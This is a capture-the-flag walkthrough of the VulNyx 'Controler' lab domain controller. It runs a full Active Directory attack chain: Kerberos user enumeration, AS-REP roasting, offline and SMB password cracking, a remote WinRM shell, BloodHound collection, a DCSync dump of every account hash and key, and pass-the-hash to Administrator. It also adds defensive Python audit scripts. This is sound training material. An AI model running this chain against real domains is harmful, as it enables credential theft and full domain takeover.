VulNyx Controler Walkthrough

Download the VM from https://vulnyx.com/file/Controler.php.
This walkthrough follows the box author's own write-up; it is partly learning and partly a record. After so many Linux boxes a Windows box is a nice change, and I found it quite interesting.

Scan the ports.

└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-01 13:13 CST
Nmap scan report for control.nyx (192.168.56.139)
Host is up (0.00032s latency).
Not shown: 65510 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-01 20:13:42Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: control.nyx0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: control.nyx0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49672/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:62:32:E9 (Oracle VirtualBox virtual NIC)
Service Info: Host: CONTROLER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 14h59m57s
| smb2-time: 
|   date: 2024-11-01T20:14:36
|_  start_date: N/A
|_nbstat: NetBIOS name: CONTROLER, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:62:32:e9 (Oracle VirtualBox virtual NIC)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Of note are 88/kerberos, 389/ldap and 445/smb. The output reveals Domain: control.nyx, so add that name to /etc/hosts. Next we enumerate the services for key information, starting with SMB: there are no usable shares.

└─$ netexec smb $IP                                                      
SMB         192.168.56.139  445    CONTROLER        [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)

└─$ smbclient -NL 192.168.56.139
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.139 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

RPC next; nothing useful here either.

└─$ rpcclient -N -U "" $IP -c "querydispinfo"         
result was NT_STATUS_ACCESS_DENIED

└─$ rpcclient -N -U "" $IP -c "enumdomusers" 
result was NT_STATUS_ACCESS_DENIED

Now LDAP.

└─$ ldapsearch -x -H "ldap://$IP" -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=control,DC=nyx
ldapServiceName: control.nyx:controler$@CONTROL.NYX
...
namingContexts: DC=control,DC=nyx
namingContexts: CN=Configuration,DC=control,DC=nyx
namingContexts: CN=Schema,CN=Configuration,DC=control,DC=nyx
namingContexts: DC=DomainDnsZones,DC=control,DC=nyx
namingContexts: DC=ForestDnsZones,DC=control,DC=nyx
isSynchronized: TRUE
highestCommittedUSN: 73754
dsServiceName: CN=NTDS Settings,CN=CONTROLER,CN=Servers,CN=Default-First-Site-
 Name,CN=Sites,CN=Configuration,DC=control,DC=nyx
dnsHostName: Controler.control.nyx
defaultNamingContext: DC=control,DC=nyx
currentTime: 20241101203821.0Z
configurationNamingContext: CN=Configuration,DC=control,DC=nyx

Now Kerberos. To enumerate usernames I used a common Kerberos username list, https://raw.githubusercontent.com/attackdebris/kerberos_enum_userlists/refs/heads/master/A-Z.Surnames.txt, and it turned up one user: b.lewis.

└─$ kerbrute_linux_amd64 userenum --dc $IP -d control.nyx A-Z.Surnames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 11/01/24 - Ronnie Flathers @ropnop

2024/11/01 13:44:53 >  Using KDC(s):
2024/11/01 13:44:53 >   192.168.56.139:88

2024/11/01 13:44:53 >  [+] VALID USERNAME:       B.LEWIS@control.nyx
2024/11/01 13:45:02 >  Done! Tested 13000 usernames (1 valid) in 8.709 second

The next step is an AS-REP Roasting attack. The basic principle:

AS-REP Roasting is an offline brute-force attack against user accounts. Its use is fairly limited, because it requires the account to have the "Do not require Kerberos preauthentication" option set, and that option is not checked by default. Kerberos pre-authentication happens in the first stage of Kerberos authentication (AS_REQ/AS_REP), and its main purpose is to prevent offline password brute-forcing. Pre-authentication is enabled by default, and the KDC records failed password attempts to prevent online brute-forcing.
When pre-authentication is disabled, an attacker can request a ticket for the chosen user from the domain controller's Kerberos port 88; the DC returns the TGT and the Login Session Key encrypted with that user's hash without performing any verification. The attacker can then crack the Login Session Key encrypted with the user's hash offline, and with a strong enough wordlist may recover that user's plaintext password.

Using the Impacket script, we obtain the user's password hash.

└─$ echo "b.lewis" > user.dic                                                                               

└─$ impacket-GetNPUsers control.nyx/ -no-pass -usersfile user.dic 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$b.lewis@CONTROL.NYX:cafe0af2e965c8b30ab392fcd306bb65$4cf870350488dd5ef75b8698a5955e7fa7c881da679e2ff04584acdce215d62745bce14880882e291087fd6b15b9cc1e6ebbb54ff9384a28fb501f551959a1b654bcdb93e830d63a2f085dc36d59843dbbfb2701aec4bd95cb427ebefd3027585915d925db075bcacbd8983d78ddbc258bbb627d3dd7dd5a83679bacb032ad30f7b65659c4f4bede49b49e0b45bc51e013a17bb3bbc1dc62cddb28e573907727759201972e26c6f6aac2b750f99a2109ae0224c88307be5bc50e7bcab2bb4a39f40333df131cbcb7715e07b5ffe51de755ce8f89b8fee766cb55031e1143e5aa387364c23f1523bd4ea7

Crack the hash to get the password.

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
101Music         ($krb5asrep$23$b.lewis@CONTROL.NYX)     
1g 0:00:00:13 DONE (2024-11-01 13:53) 0.07173g/s 965362p/s 965362c/s 965362C/s 101eagles..101Mromally
Use the "--show" option to display all of the cracked passwords reliably

We can verify that this username and password work for the SMB service, but WinRM still refuses the connection.

└─$ netexec smb $IP -u 'b.lewis' -p '101Music'         
SMB         192.168.56.139  445    CONTROLER        [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)
SMB         192.168.56.139  445    CONTROLER        [+] control.nyx\b.lewis:101Music 

└─$ netexec winrm $IP -u 'b.lewis' -p '101Music'
WINRM       192.168.56.139  5985   CONTROLER        [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLER) (domain:control.nyx)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.139  5985   CONTROLER        [-] control.nyx\b.lewis:101Music

With the RPC service we can enumerate users further.

└─$ rpcclient -U "b.lewis%101Music" $IP -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[j.levy] rid:[0x44f]
user:[b.lewis] rid:[0x450]
user:[m.klein] rid:[0x451]
user:[d.petrov] rid:[0x452]
user:[a.hansen] rid:[0x453]
┌──(kali㉿mykali)-[~/Documents/controler]
└─$ rpcclient -U "b.lewis%101Music" $IP -c "querydispinfo"
index: 0xfb1 RID: 0x453 acb: 0x00000211 Account: a.hansen       Name: Axel Hansen       Desc: (Account Disabled)
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: (Account Enabled)
index: 0xfae RID: 0x450 acb: 0x00010210 Account: b.lewis        Name: Ben Lewis Desc: (Account Enabled)
index: 0xfb0 RID: 0x452 acb: 0x00000211 Account: d.petrov       Name: Dave Petrov       Desc: (Account Disabled)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: (Account Disabled)
index: 0xfac RID: 0x44f acb: 0x00000210 Account: j.levy Name: John Levy Desc: (Account Enabled)
index: 0xf10 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0xfaf RID: 0x451 acb: 0x00000211 Account: m.klein        Name: Mike Klein        Desc: (Account Disabled)
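The acb column in that querydispinfo output is the account-control bitmask from MS-SAMR, and it already tells you which accounts the AS-REP Roasting step above would work against: bit 0x10000 is DONT_REQUIRE_PREAUTH, and b.lewis's 0x00010210 has it set. Below is a small Python decoder I added for this write-up (it is not part of the original walkthrough or of rpcclient) that parses the lines as shown on the page, names each flag, and lists enabled accounts with pre-authentication disabled; it is the same check a domain admin would run to find such accounts before anyone else does. The flag names are my shorthand for the USER_ACCOUNT codes in MS-SAMR 2.2.1.13, and the sample input is a copy of the output above.

```python
import re

# USER_ACCOUNT control bits from MS-SAMR 2.2.1.13; rpcclient prints this
# bitmask as the "acb" field of querydispinfo. Names are shorthand.
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000002: "HOMEDIR_REQUIRED",
    0x00000004: "PASSWORD_NOT_REQUIRED",
    0x00000008: "TEMP_DUPLICATE",
    0x00000010: "NORMAL_ACCOUNT",
    0x00000020: "MNS_LOGON",
    0x00000040: "INTERDOMAIN_TRUST",
    0x00000080: "WORKSTATION_TRUST",
    0x00000100: "SERVER_TRUST",
    0x00000200: "DONT_EXPIRE_PASSWORD",
    0x00000400: "AUTO_LOCKED",
    0x00000800: "ENCRYPTED_TEXT_PASSWORD_ALLOWED",
    0x00001000: "SMARTCARD_REQUIRED",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00004000: "NOT_DELEGATED",
    0x00008000: "USE_DES_KEY_ONLY",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PASSWORD_EXPIRED",
    0x00040000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x00080000: "NO_AUTH_DATA_REQUIRED",
}
ACB_DISABLED = 0x00000001
ACB_DONT_REQUIRE_PREAUTH = 0x00010000

# Sample input: the querydispinfo lines from this box, copied from the page.
SAMPLE = """\
index: 0xfb1 RID: 0x453 acb: 0x00000211 Account: a.hansen       Name: Axel Hansen       Desc: (Account Disabled)
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: (Account Enabled)
index: 0xfae RID: 0x450 acb: 0x00010210 Account: b.lewis        Name: Ben Lewis Desc: (Account Enabled)
index: 0xfb0 RID: 0x452 acb: 0x00000211 Account: d.petrov       Name: Dave Petrov       Desc: (Account Disabled)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: (Account Disabled)
index: 0xfac RID: 0x44f acb: 0x00000210 Account: j.levy Name: John Levy Desc: (Account Enabled)
index: 0xf10 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0xfaf RID: 0x451 acb: 0x00000211 Account: m.klein        Name: Mike Klein        Desc: (Account Disabled)
"""

LINE_RE = re.compile(r"RID:\s*(0x[0-9a-f]+)\s+acb:\s*(0x[0-9a-f]+)\s+Account:\s*(\S+)")


def decode_acb(acb):
    """Names of the flags set in an acb value, lowest bit first."""
    return [name for bit, name in sorted(ACB_FLAGS.items()) if acb & bit]


def parse_dispinfo(text):
    """Parse querydispinfo output into dicts with rid, acb, account and flags."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # not an account line
        rid, acb, account = int(m.group(1), 16), int(m.group(2), 16), m.group(3)
        rows.append({"rid": rid, "acb": acb, "account": account, "flags": decode_acb(acb)})
    return rows


def enabled_accounts(rows):
    """Accounts whose DISABLED bit is clear."""
    return sorted(r["account"] for r in rows if not r["acb"] & ACB_DISABLED)


def asrep_roastable(rows):
    """Enabled accounts with Kerberos pre-authentication switched off."""
    return sorted(r["account"] for r in rows
                  if r["acb"] & ACB_DONT_REQUIRE_PREAUTH and not r["acb"] & ACB_DISABLED)


if __name__ == "__main__":
    rows = parse_dispinfo(SAMPLE)
    for r in rows:
        print(f"{r['account']:<14} rid=0x{r['rid']:<4x} acb=0x{r['acb']:08x} {', '.join(r['flags'])}")
    print("enabled:", enabled_accounts(rows))
    print("pre-auth not required:", asrep_roastable(rows))
```

Run against this box's output it reports exactly one account with pre-authentication disabled, b.lewis, which is why the GetNPUsers request below returns a hash for that user and nobody else. The same bit can be queried directly in LDAP as userAccountControl 0x400000 (UF_DONT_REQUIRE_PREAUTH); the SAMR value above is what rpcclient shows.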

We can see that j.levy and b.lewis are valid; the other accounts are unusable. j.levy's SMB password can be brute-forced.

└─$ netexec smb $IP -u 'j.levy' -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding -t 10
...
SMB         192.168.56.139  445    CONTROLER        [+] control.nyx\j.levy:Password1

j.levy can connect over WinRM.

└─$ netexec winrm $IP -u 'j.levy' -p 'Password1'                                       
WINRM       192.168.56.139  5985   CONTROLER        [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLER) (domain:control.nyx)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.139  5985   CONTROLER        [+] control.nyx\j.levy:Password1 (Pwn3d!

└─$ evil-winrm -i 192.168.56.139 -u 'j.levy' -p 'Password1'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.levy\Documents> whoami
control\j.levy

Upload SharpHound to the target, run it and collect the data.

*Evil-WinRM* PS C:\Users\j.levy\Documents> upload SharpHound.exe

Info: Uploading /home/kali/Documents/controler/SharpHound.exe to C:\Users\j.levy\Documents\SharpHound.exe                                                                                            

Data: 1402880 bytes of 1402880 bytes copied                                                                                                                                                          

Info: Upload successful!
*Evil-WinRM* PS C:\Users\j.levy\Documents> .\SharpHound.exe                                                                                                                                          
2024-11-01T14:13:02.3921638-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound                                                                          
2024-11-01T14:13:02.4574862-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote                          
2024-11-01T14:13:02.4574862-07:00|INFORMATION|Initializing SharpHound at 2:13 PM on 11/1/2024                                                                                                        
2024-11-01T14:13:02.5592260-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for control.nyx : Controler.control.nyx                                                            
2024-11-01T14:13:02.6911408-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote                                                
2024-11-01T14:13:02.7181923-07:00|INFORMATION|Beginning LDAP search for control.nyx                                                                                                                  
2024-11-01T14:13:02.7655606-07:00|INFORMATION|Producer has finished, closing LDAP channel                                                                                                            
2024-11-01T14:13:02.7655606-07:00|INFORMATION|LDAP channel closed, waiting for consumers                                                                                                             
2024-11-01T14:13:33.0039549-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM                                                                                                 
2024-11-01T14:13:48.3628044-07:00|INFORMATION|Consumers finished, closing output channel                                                                                                             
2024-11-01T14:13:48.4043452-07:00|INFORMATION|Output channel closed, waiting for output task to complete                                                                                             
Closing writers                                                                                                                                                                                      
2024-11-01T14:13:48.4539005-07:00|INFORMATION|Status: 95 objects finished (+95 2.111111)/s -- Using 51 MB RAM
2024-11-01T14:13:48.4539005-07:00|INFORMATION|Enumeration finished in 00:00:45.6989181            
2024-11-01T14:13:48.4881995-07:00|INFORMATION|Saving cache with stats: 54 ID to type mappings.                                                                                                       
 54 name to SID mappings.                                                                         
 0 machine sid mappings.                                                                                                                                                                             
 2 sid to domain mappings.                                                                                                                                                                           
 0 global catalog mappings.                                                                                                                                                                          
2024-11-01T14:13:48.4881995-07:00|INFORMATION|SharpHound Enumeration Completed at 2:13 PM on 11/1/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\j.levy\Documents> dir                                                    

    Directory: C:\Users\j.levy\Documents                                                          

Mode                LastWriteTime         Length Name                                                                                                                                                
----                -------------         ------ ----                                                                                                                                                
-a----        11/1/2024   2:13 PM          11381 20241101141348_BloodHound.zip                                                                                                                       
-a----        11/1/2024   2:13 PM           8136 MWMwNWZhMWQtNWU5Yi00ZGZhLTgzZDEtMDE5NjRmMmE2NWEw.bin
-a----        11/1/2024   2:12 PM        1052160 SharpHound.exe
*Evil-WinRM* PS C:\Users\j.levy\Documents> download 20241101141348_BloodHound.zip

Info: Downloading C:\Users\j.levy\Documents\20241101141348_BloodHound.zip to 20241101141348_BloodHound.zip

Info: Download successful!

Unzipping the collected archive yields several JSON files. The jq command can be used to inspect them; note that the j.levy user has AllExtendedRights.

└─$ jq "." 20241101141348_users.json
    {                                                                                                                                                                                               
      "Properties": {                                                                                                                                                                               
        "domain": "CONTROL.NYX",                                                                                                                                                                    
        "name": "J.LEVY@CONTROL.NYX",                                                                                                                                                               
        "distinguishedname": "CN=JOHN LEVY,CN=USERS,DC=CONTROL,DC=NYX",                                                                                                                             
        "domainsid": "S-1-5-21-2142633474-2248127568-3584646925",                                                                                                                                   
        "highvalue": false,                                                                                                                                                                         
        "samaccountname": "j.levy",
        ...
                {
          "PrincipalSID": "CONTROL.NYX-S-1-5-32-544",
          "PrincipalType": "Group",
          "RightName": "AllExtendedRights",
          "IsInherited": true
        },
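To go beyond eyeballing jq output, here is an added Python example (mine, not from the walkthrough or from BloodHound) that walks a SharpHound users.json and reports ACEs granting broad rights to principals other than the built-in administrative identities. The file layout it assumes (a top-level "data" list with "Properties" and "Aces" per object, ACE fields as shown above) is what SharpHound 4.x writes as far as I know; the sample document is constructed: the j.levy entry copies the fields shown above, while the second user and its domain SID S-1-5-21-0-0-0 are made up so the filter has something to flag.

```python
import json

# Rights BloodHound records in ACE entries that are worth reviewing whenever
# something other than the expected administrative identities holds them.
INTERESTING_RIGHTS = {
    "AllExtendedRights", "GenericAll", "GenericWrite", "WriteDacl",
    "WriteOwner", "Owns", "ForceChangePassword", "GetChanges", "GetChangesAll",
}

# Principals expected to hold broad rights on every object.
EXPECTED_PRINCIPALS = {
    "S-1-5-32-544",  # BUILTIN\Administrators (the ACE shown on j.levy above)
    "S-1-5-18",      # NT AUTHORITY\SYSTEM
}

# Constructed sample in the shape of a SharpHound users.json. The j.levy
# entry copies the fields shown on the page; EXAMPLE.USER and the domain
# SID S-1-5-21-0-0-0 are made up for the demonstration.
SAMPLE_USERS_JSON = json.dumps({
    "data": [
        {
            "Properties": {"domain": "CONTROL.NYX", "name": "J.LEVY@CONTROL.NYX",
                           "samaccountname": "j.levy"},
            "Aces": [
                {"PrincipalSID": "CONTROL.NYX-S-1-5-32-544", "PrincipalType": "Group",
                 "RightName": "AllExtendedRights", "IsInherited": True},
            ],
        },
        {
            "Properties": {"domain": "CONTROL.NYX", "name": "EXAMPLE.USER@CONTROL.NYX",
                           "samaccountname": "example.user"},
            "Aces": [
                {"PrincipalSID": "CONTROL.NYX-S-1-5-32-544", "PrincipalType": "Group",
                 "RightName": "GenericAll", "IsInherited": True},
                {"PrincipalSID": "S-1-5-21-0-0-0-1105", "PrincipalType": "User",
                 "RightName": "ForceChangePassword", "IsInherited": False},
            ],
        },
    ],
    "meta": {"type": "users", "count": 2},
})


def bare_sid(principal_sid):
    """Drop the 'DOMAIN-' prefix BloodHound puts in front of well-known SIDs."""
    i = principal_sid.find("S-1-")
    return principal_sid[i:] if i >= 0 else principal_sid


def aces_on(users_json, object_name):
    """All ACEs on one object as (principal SID, right, inherited) tuples."""
    for obj in json.loads(users_json).get("data", []):
        if obj.get("Properties", {}).get("name") == object_name:
            return [(bare_sid(a["PrincipalSID"]), a["RightName"], bool(a.get("IsInherited")))
                    for a in obj.get("Aces", [])]
    return []


def unexpected_aces(users_json):
    """(target, principal SID, right, inherited) for every interesting right
    held by a principal outside EXPECTED_PRINCIPALS: the entries to review."""
    findings = []
    for obj in json.loads(users_json).get("data", []):
        target = obj.get("Properties", {}).get("name", "?")
        for ace in obj.get("Aces", []):
            sid = bare_sid(ace.get("PrincipalSID", ""))
            right = ace.get("RightName")
            if right in INTERESTING_RIGHTS and sid not in EXPECTED_PRINCIPALS:
                findings.append((target, sid, right, bool(ace.get("IsInherited"))))
    return findings


if __name__ == "__main__":
    # With a real collection: unexpected_aces(open("20241101141348_users.json").read())
    for target, sid, right, inherited in unexpected_aces(SAMPLE_USERS_JSON):
        print(f"{sid} has {right} on {target} ({'inherited' if inherited else 'explicit'})")
```

On the j.levy object the only ACE in the sample is the inherited AllExtendedRights held by BUILTIN\Administrators, so it is filtered out as expected; the constructed ForceChangePassword entry on the second user is what gets reported. The same loop works over groups.json and computers.json, since SharpHound uses the same "Aces" shape there.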

Since j.levy's privileges are high, we can dump the administrator's hash. Note the command syntax here: secretsdump DOMAIN/USER:PASSWORD@DOMAINCONTROLLER

└─$ impacket-secretsdump control.nyx/j.levy:Password1@CONTROL.NYX  -target-ip 192.168.56.139                                                                                                        
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies                                                                                                                               

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied                                                                                                                  
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                                                       
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b70cca1e5225303104dea9942d31f3a7:::
control.nyx\j.levy:1103:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
control.nyx\b.lewis:1104:aad3b435b51404eeaad3b435b51404ee:08f37c649690b7df615961f71831ef4a:::
control.nyx\m.klein:1105:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
control.nyx\d.petrov:1106:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
control.nyx\a.hansen:1107:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
CONTROLER$:1000:aad3b435b51404eeaad3b435b51404ee:97a43247d14c80f991b4e6ccbc61f8be:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9a8c983c709e851258912c3b1d71c9b05faf1724f522b4f32e57f7bef3366773
Administrator:aes128-cts-hmac-sha1-96:0ca176565c5b47fda5e2ab4f53fbb9d3
Administrator:des-cbc-md5:ce9785d980c1a7f8
krbtgt:aes256-cts-hmac-sha1-96:98eaf007fcf3006a8526cba84496bffc6835fbb9f6291c4a5c467be83c10e6ac
krbtgt:aes128-cts-hmac-sha1-96:4f348630f6cf1829080f97ad008432c0
krbtgt:des-cbc-md5:6bdaae6d83f7ce08
control.nyx\j.levy:aes256-cts-hmac-sha1-96:0e6ca71073eab87d2e5195b9da28498dfa76a62f7e5d5bd22b6fb2c05677daa0
control.nyx\j.levy:aes128-cts-hmac-sha1-96:7a0a723a44a010bb3da571a16f6edefb
control.nyx\j.levy:des-cbc-md5:54918ae57a10f2bf
control.nyx\b.lewis:aes256-cts-hmac-sha1-96:b4f57e910e3bdea0ad3bdc1ad2513759f2f88eb8650f5f470ac08f9b210a2198
control.nyx\b.lewis:aes128-cts-hmac-sha1-96:7f2031c82ee5bc662dc3cd7cc3235a66
control.nyx\b.lewis:des-cbc-md5:a4132f64d5ce670b
control.nyx\m.klein:aes256-cts-hmac-sha1-96:4a793709dcdcf73950b685f896a9848e3103d5a18b01c7e5d59ba38c57b8672b
control.nyx\m.klein:aes128-cts-hmac-sha1-96:57aeb83d17ac7f9ca2a6b9237d40dc70
control.nyx\m.klein:des-cbc-md5:f19bdfdad5d3b0a1
control.nyx\d.petrov:aes256-cts-hmac-sha1-96:33fe5c70d3443ebe7ecde982ac1bd96b56827d38144666f8a6b8826950697f3a
control.nyx\d.petrov:aes128-cts-hmac-sha1-96:bc33a875e59d41c1a601fd7a2519d659
control.nyx\d.petrov:des-cbc-md5:c29d76f7b62aab92
control.nyx\a.hansen:aes256-cts-hmac-sha1-96:fd82c8b8af1452f8eede5b2ad82a7a9d0a82a3f6bfcd3a69d075f88fd40b0fe6
control.nyx\a.hansen:aes128-cts-hmac-sha1-96:8606d5df957b06541cbb988be5835c80
control.nyx\a.hansen:des-cbc-md5:34e05b94b37564c1
CONTROLER$:aes256-cts-hmac-sha1-96:0966cc16ce2ab931b9b5caa42e22478abb604cd827a4126ffabff95bcc973b6c
CONTROLER$:aes128-cts-hmac-sha1-96:c995e40cf30c060da31419be4db19d68
CONTROLER$:des-cbc-md5:ec5e1658b34f1f20

With the administrator's hash we can log in and get root.

└─$ evil-winrm -i 192.168.56.139 -u 'administrator' -H 48b20d4f3ea31b7234c92b71c90fbff7

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
control\administrator

A small side note: impacket-secretsdump output normally has the format username:RID:LM hash:NTLM hash:::other information

Username: the account name (e.g. Administrator).
RID: the account's Relative Identifier, part of the Windows security identifier (SID), normally used to uniquely identify an account.
LM hash: the LAN Manager hash, old and weak. On modern systems it is usually empty (aad3b435b51404eeaad3b435b51404ee denotes an empty LM hash).
NTLM hash: the NT LAN Manager hash, the more common hash format in Windows, used to store the digest of the user's password.
Other information: extra data, typically including hash history, service credentials, etc.
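As an added example (mine, not from the walkthrough or from Impacket), the Python below parses that format using the NTDS lines from this box, skips the Kerberos key lines that follow them, and then runs the checks a defender would run on such a dump: which accounts share an NT hash (i.e. the same password), which have the empty-password NT hash, and whether any LM hash is still stored. On this box it shows that m.klein, d.petrov and a.hansen carry the same NT hash as Administrator.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# One NTDS line: [domain\]user:rid:lmhash:nthash:::  The Kerberos key lines
# ("user:aes256-cts-hmac-sha1-96:...") have no numeric RID and do not match.
NTDS_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::"
)

# Sample input: the secretsdump output from this box, copied from the page
# (raw string because of the backslashes in domain\user).
SAMPLE = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b70cca1e5225303104dea9942d31f3a7:::
control.nyx\j.levy:1103:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
control.nyx\b.lewis:1104:aad3b435b51404eeaad3b435b51404ee:08f37c649690b7df615961f71831ef4a:::
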